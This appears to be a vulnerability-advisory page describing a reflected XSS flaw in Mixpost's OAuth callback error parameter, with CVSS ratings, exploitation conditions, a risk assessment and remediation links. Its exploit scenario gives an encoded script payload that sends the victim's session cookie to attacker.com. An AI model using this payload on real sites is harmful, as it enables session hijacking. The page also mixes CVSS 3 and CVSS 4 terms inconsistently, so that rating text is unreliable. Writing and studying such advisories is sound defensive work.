Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Reflected XSS crosses browser scope boundary (S:C); attacker is unauthenticated (PR:N) but victim click is required (UI:R); C:L/I:L for session theft and unauthorized actions; no availability impact.
Primary rating from Vendor (vulncheck).
CVSS VectorVendor: vulncheck
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
1DescriptionCVE.org
Mixpost through 2.6.0 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to execute arbitrary JavaScript in authenticated users' browsers by crafting malicious OAuth callback URLs with unsanitized error query parameters. Attackers can exploit the OAuth callback controller's failure to sanitize error parameters before rendering them through Laravel flash messages via the Vue v-html directive to hijack authenticated user sessions or perform unauthorized actions.
AnalysisAI
Reflected XSS in Mixpost through version 2.6.0 enables unauthenticated remote attackers to execute arbitrary JavaScript in authenticated users' browsers by delivering crafted OAuth callback URLs containing malicious error query parameters. The OAuth callback controller fails to sanitize error parameters before routing them through Laravel flash messages, which are then rendered by Vue's v-html directive without HTML escaping - creating a direct injection path into the DOM. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires all of the following conditions: (1) the target instance runs Mixpost through version 2.6.0; (2) at least one OAuth-based social media integration is configured and active, enabling the OAuth callback controller code path; (3) an authenticated Mixpost user - the victim - must navigate to an attacker-crafted OAuth callback URL containing a malicious error query parameter, typically via a phishing link or injected hyperlink. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 4.0 base score of 5.1 (Medium) accurately models this vulnerability's structure: the attacker has no authentication requirement and faces low complexity (AV:N/AC:L/AT:N/PR:N), but the attack is gated behind required user interaction (UI:A), and all tangible impact falls on the subsequent system - the authenticated victim's browser session (SC:L/SI:L) - rather than the server itself (VC:N/VI:N/VA:N). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker identifies an organization using Mixpost and crafts a callback URL such as https://target-mixpost.example.com/oauth/callback?error=%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fattacker.com%2Fsteal%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E, then delivers it to an authenticated Mixpost administrator via a phishing email disguised as a social media platform notification. When the administrator clicks the link, their browser loads the callback page, the unsanitized error parameter is rendered via v-html into the DOM, and the attacker's script executes - exfiltrating the session cookie or silently performing actions (such as publishing posts) through the victim's authenticated context. … |
| Remediation | Upgrade Mixpost beyond version 2.6.0 once a patched release is confirmed available; however, an exact fixed version has not been independently confirmed from the available references - the GitHub issue (https://github.com/inovector/mixpost/issues/204) and VulnCheck advisory (https://www.vulncheck.com/advisories/mixpost-reflected-xss-via-oauth-callback-error-parameter) should be monitored for a confirmed patch. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-40143
GHSA-x4g3-x4c9-rjf8